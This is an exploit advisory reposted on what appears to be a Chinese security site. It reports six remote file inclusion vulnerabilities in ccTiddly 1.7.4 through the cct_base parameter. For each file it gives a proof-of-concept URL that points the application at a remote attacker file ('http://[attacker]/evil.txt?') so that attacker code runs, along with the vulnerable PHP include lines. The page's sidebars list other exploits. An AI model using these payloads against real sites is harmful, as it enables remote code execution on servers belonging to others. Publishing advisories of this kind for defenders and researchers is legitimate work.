首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
来源:www.vfcocus.net 作者:cOndemned 发布时间:2008-12-05  
/*

$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $

ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
found by cOndemned

download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip

Probably prior versions are vulnerable too...

Greetz: ZaBeaTy, str0ke, TBH, Avantura

*/


0x01 :
file :
/index.php
poc :
http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
source : 

18. //includes
19. if(!isset($cct_base))
20. $cct_base = "";
21.
22. include_once($cct_base."includes/header.php");
23. include_once($cct_base."includes/login.php");

0x02 :

file :
/handle/proxy.php
poc :
http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
source :

3. if(!isset($cct_base))
4. $cct_base= "../";
5. include_once($cct_base."includes/header.php");
6. include_once($cct_base."includes/config.php");

0x03 :

file :
/includes/header.php
poc :
http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
source :

5. if(!isset($cct_base))
6. $cct_base= "";
7. include_once($cct_base."includes/functions.php");
8. include_once($cct_base."includes/config.php");
9. include_once($cct_base."includes/pluginLoader.php");
10. include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php");
11. //include is used because language file is included once in config.php file
12. include_once($cct_base."includes/tiddler.php");
13. include_once($cct_base."includes/user.php");

0x04 :

file :
/includes/include.php
poc :
http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
source :

3. include_once($cct_base."includes/ccAssignments.php");

0x05 :

file :
/includes/workspace.php
poc :
http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt?
source :
3. include_once($cct_base."includes/header.php");
4. include_once($cct_base."includes/user.php");
5. include_once($cct_base."includes/tiddler.php");

0x06 :

file :
/plugins/RSS/files/rss.php
poc :
http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt?
source :

3. include_once($cct_base."includes/header.php");

EoF.
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RadAsm <= 2.2.1.4 (.RAP File)
·Joomla Component com_jmovies 1
·EiD <= 0.92 Malformed PE File
·ClamAV < 0.94.2 (JPG File) Sta
·NULL FTP Server 1.1.0.7 SITE P
·Cain & Abel 4.9.23 (rdp file)
·Visagesoft eXPert PDF EditorX
·Check New 4.52 (findoffice.php
·DesignWorks Professional 4.3.1
·CPanel version 11.x privilege
·IPNPro3 <= 1.44 Admin Password
·DL PayCart <= 1.34 Admin Passw
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved